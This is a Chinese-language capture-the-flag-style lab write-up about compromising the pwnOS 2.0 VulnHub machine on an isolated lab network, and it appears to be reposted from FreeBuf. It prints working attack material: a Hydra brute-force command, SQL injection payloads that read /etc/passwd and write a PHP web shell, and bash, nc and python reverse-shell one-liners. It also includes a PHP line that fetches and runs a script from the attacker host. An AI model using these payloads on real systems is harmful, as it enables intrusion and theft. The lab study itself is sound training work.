记一次靶机实验
2021-03-14 22:33:42 Author: www.freebuf.com(查看原文) 阅读量:128 收藏

目录

靶机地址

信息收集

Whatweb 查是否是CMS

访问80页面

IsIntS

目录遍历

PHP信息版本

搜索漏洞利用

hydra 爆破web登录页面

尝试错误

爆破:killerbeesareflying

报错注入

输入账户密码登录blog

查看源码

注入读取文件load_file

into outfile 函数

命令执行

反弹shell [一]

反弹shell [二]

提权

直接登录成功

(二)查看blog源码

MSF

登录成功

上传php-reverse-shell.php

反弹shell

查看内核版本 web

数据库

提权为ROOT

(三) sqlmap

登录

--os-shell  文件上传链接

后门

反弹shell

无果不能反弹

sqlmap --file-write --file-dest   没成功;

参考链接

src=http%3A%2F%2Fn.sinaimg.cn%2Ftranslate%2F2%2Fw480h322%2F20180812%2FPsCZ-hhqtawx2388935.jpg&refer=http%3A%2F%2Fn.sinaimg.cn&app=2002&size=f9999,10000&q=a80&n=0&g=0n&fmt=jpeg?sec=1618319050&t=a75117aba852216ccedc81b79c4681ad

靶机地址

https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

仅主机模式:10.10.10.100

攻击机IP也应该在10.10.10.0/24 网段上

修改虚拟网络

信息收集

<pre>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
</pre>

Whatweb 查是否是CMS

root@kali:~# whatweb 10.10.10.100
http://10.10.10.100 [200 OK] Apache[2.2.17], Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[[email protected]], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], IP[10.10.10.100], PHP[5.3.5-1ubuntu7], Title[Welcome to this Site!], X-Powered-By[PHP/5.3.5-1ubuntu7]

1615728376_604e0ef810a6f6f7e14a2.png!small?1615728375588

root@kali:~# whatweb -v 10.10.10.100

WhatWeb report for http://10.10.10.100

Status    : 200 OK

Title     : Welcome to this Site!

IP        : 10.10.10.100

Country   : RESERVED, ZZ

 

Summary   : Email[[email protected]], PHP[5.3.5-1ubuntu7], Cookies[PHPSESSID], X-Powered-By[PHP/5.3.5-1ubuntu7], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], Apache[2.2.17]

 

Detected Plugins:

[ Apache ]

        The Apache HTTP Server Project is an effort to develop and

        maintain an open-source HTTP server for modern operating

        systems including UNIX and Windows NT. The goal of this

        project is to provide a secure, efficient and extensible

        server that provides HTTP services in sync with the current

        HTTP standards.

 

        Version      : 2.2.17 (from HTTP Server Header)

        Google Dorks: (3)

        Website     : http://httpd.apache.org/

 

[ Cookies ]

        Display the names of cookies in the HTTP headers. The

        values are not returned to save on space.

 

        String       : PHPSESSID

 

[ Email ]

        Extract email addresses. Find valid email address and

        syntactically invalid email addresses from mailto: link

        tags. We match syntactically invalid links containing

        mailto: to catch anti-spam email addresses, eg. bob at

        gmail.com. This uses the simplified email regular

        expression from

        http://www.regular-expressions.info/email.html for valid

        email address matching.

 

        String       : [email protected]

 

[ HTTPServer ]

        HTTP server header string. This plugin also attempts to

        identify the operating system from the server header.

 

        OS           : Ubuntu Linux

        String       : Apache/2.2.17 (Ubuntu) (from server string)

 

[ PHP ]

        PHP is a widely-used general-purpose scripting language

        that is especially suited for Web development and can be

        embedded into HTML. This plugin identifies PHP errors,

        modules and versions and extracts the local file path and

        username if present.

 

        Version      : 5.3.5-1ubuntu7

        Google Dorks: (2)

        Website     : http://www.php.net/

 

[ X-Powered-By ]

        X-Powered-By HTTP header

 

        String       : PHP/5.3.5-1ubuntu7 (from x-powered-by string)

 

HTTP Headers:

        HTTP/1.1 200 OK

        Date: Sun, 01 Nov 2020 12:03:58 GMT

        Server: Apache/2.2.17 (Ubuntu)

        X-Powered-By: PHP/5.3.5-1ubuntu7

        Set-Cookie: PHPSESSID=l0bmtqrfk7rh83bq157fbfm585; path=/

        Expires: Thu, 19 Nov 1981 08:52:00 GMT

        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

        Pragma: no-cache

        Vary: Accept-Encoding

        Content-Encoding: gzip

        Content-Length: 500

        Connection: close

        Content-Type: text/html

访问80页面 IsIntS

1615728328_604e0ec8dceeda8db4f13.png!small?1615728328477

目录遍历

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)                                                                                             
==> DIRECTORY: http://10.10.10.100/blog/                                                                                                     
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)                                                                                           
==> DIRECTORY: http://10.10.10.100/includes/                                                                                                 
+ http://10.10.10.100/index (CODE:200|SIZE:854)                                                                                              
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)                                                                                          
+ http://10.10.10.100/info (CODE:200|SIZE:50175)                                                                                             
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)                                                                                         
+ http://10.10.10.100/login (CODE:200|SIZE:1174)                                                                                             
+ http://10.10.10.100/register (CODE:200|SIZE:1562)                                                                                          
+ http://10.10.10.100/server-status (CODE:403|SIZE:293) 

PHP信息版本

http://10.10.10.100/info.php

PHP Version 5.3.5-1ubuntu7   Apache/2.2.17 (Ubuntu)      
Server Administrator : webmaster@localhost        
PATH :  /usr/local/bin:/usr/bin:/bin

1615728295_604e0ea71bb740098e759.png!small?1615728294493

搜索漏洞利用


1615728226_604e0e62e94650ce415e2.png!small?1615728226375

hydra 爆破web登录页面

root@kali:~# hydra -t 1 -l [email protected] -P /usr/share/wordlists/rockyou.txt  -vV -f 10.10.10.100 http-post-form "/:email=^USER^&&password=^PASS^&&submit="Login"&&submitted="TRUE":error"


1615728203_604e0e4bca061d9dccfdd.png!small?1615728203128

尝试错误1615728174_604e0e2eb34f01fb493f9.png!small?1615728174160

爆破:killerbeesareflying

1615728153_604e0e1907b92d2058304.png!small?1615728152659

1615728132_604e0e04bff88c23d20ca.png!small?1615728132076

报错注入

Username:[email protected]' and updatexml(1,concat(0x3a,(0x0a,(select database()))))#

Password:x

1615728100_604e0de470ef548acba2f.png!small?16157280998191615728090_604e0ddaba40693a4fc08.png!small?1615728090080

输入账户密码登录blog

1615728071_604e0dc79ca6dc5e558e1.png!small?1615728071146

查看源码1615728049_604e0db1515180035c8ae.png!small?1615728048814

view-source:http://sourceforge.net/projects/sphpblog/


1615728031_604e0d9f6108d56556447.png!small?1615728031100

再次查看login.php,报错

1615728018_604e0d92b426a9c6684b2.png!small?1615728018024

注入读取文件load_file

email=admi'union select 1,2,3,group_concat(load_file('/etc/passwd')),5,6,7,8#&pass=123456&submit=Login&submitted=TRUE

1615727998_604e0d7e5927f9fed3d7e.png!small?1615727997802

into outfile 函数

email=admi'union select 1,2,3,'<?php system($_GET[\'cmd\'])',5,6,7,8 into outfile"/var/www/shell.php"#&pass=123456&submit=Login&submitted=TRUE

1615727971_604e0d63e1b450ab09cf7.png!small?16157279713061615727964_604e0d5c6f7b3e0188f26.png!small?1615727963830

1615727955_604e0d533ea26e7d43f3a.png!small?1615727954534

命令执行

1615727897_604e0d19d45dfd4a3217d.png!small?1615727897367

反弹shell [一]

bash: bash -i >& /dev/tcp/ip/port 0>&1

nc: nc -e /bin/sh ip port 

反弹shell [二]

python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用python的反弹shell

提权


1615727854_604e0cee7e8bf195ffd32.png!small?1615727853956

直接登录成功

1615727834_604e0cda304a286a2bdb0.png!small?1615727833677

(二)查看blog源码


1615727812_604e0cc40cfe855d74416.png!small?1615727811458

1615727804_604e0cbc8aa41cb424294.png!small?1615727803888

MSF1615727763_604e0c9336180ccf2dde2.png!small?16157277625041615727754_604e0c8a36a2e277ea00a.png!small?1615727753899

创建了新的账户密码

1615727731_604e0c73e207280a2cc26.png!small?1615727731279

登录成功

1615727719_604e0c67c9d3b2fb10787.png!small?1615727719181

出现编辑和 上传图片

1615727699_604e0c533ecdeb705ea82.png!small?1615727699020

上传php-reverse-shell.php

1615727686_604e0c46ddc38636ea6c5.png!small?1615727686525

反弹shell

1615727662_604e0c2e6caebd0c7ba7e.png!small?1615727661743

$ python -c 'import pty;pty.spawn("/bin/bash")'
1615727646_604e0c1e7438eb601f68d.png!small?1615727645870

查看内核版本 web

1615727629_604e0c0d3297e671e5c73.png!small?1615727628770

数据库

1615727613_604e0bfd8d178e155fd11.png!small?1615727613000

提权为ROOT

1615727594_604e0beae973356cf54f4.png!small?1615727594362

(三) sqlmap 

发现存在PHP的页面尝试是否能够万能密码爆破,之后,进行sql注入的尝试;

1615727573_604e0bd5b3a8e29a8a07e.png!small?1615727573169

抓包获取POST请求

1615727554_604e0bc2dd20d453f5011.png!small?1615727554327

SQLMAP

1615727542_604e0bb6185accb980637.png!small?16157275417251615727524_604e0ba42d33869e7479c.png!small?1615727523606

数据库信息

1615727504_604e0b9078297aa5b1cda.png!small?1615727503840

获取用户信息


1615727453_604e0b5def9b21ef3a62e.png!small?1615727453463


1615727437_604e0b4d787e06dcae8df.png!small?16157274368681615727429_604e0b45999ea71219d55.png!small?16157274289861615727413_604e0b35387a280fa5710.png!small?16157274126031615727405_604e0b2d0ac31e413797e.png!small?1615727404541

killerbeesareflying

登录

1615727390_604e0b1e57e57aec2248c.png!small?1615727389625

--os-shell  文件上传链接

1615727377_604e0b11b2e8f62c02762.png!small?1615727377684

http://10.10.10.100/tmpudcop.php

1615727352_604e0af8bc702c3e4aac8.png!small?1615727352186

后门

http://10.10.10.100/tmpbdsvq.php

1615727336_604e0ae80e8f533895f03.png!small?1615727335526

反弹shell

1615727321_604e0ad993a129bd61ecf.png!small?1615727321459

10.10.10.100/php-reverse-shell.php

1615727310_604e0ace474adc132b3a8.png!small?1615727309688

无果不能反弹

1615727288_604e0ab81c19b67698cd5.png!small?1615727287462

查看phpinfo的disable_function 发现没有禁用函数

1615727276_604e0aac95e4dab7e23e6.png!small?1615727276317

<?php system("cd /tmp; wget http://10.10.10.128/python.py; python python.py");?>

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

sqlmap --file-write --file-dest   没成功;

1615727254_604e0a963ee351ea8543b.png!small?1615727253680

参考链接

https://www.cnblogs.com/zongdeiqianxing/p/13455187.html

https://www.jianshu.com/p/2e492632c191

https://blog.csdn.net/tq369/article/details/84964809?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-2.control

https://blog.csdn.net/Lonelyhat/article/details/105840547

1615727232_604e0a8028de29893c7b5.png!small?1615727232885


文章来源: https://www.freebuf.com/articles/web/266098.html
如有侵权请联系:admin#unsafe.sh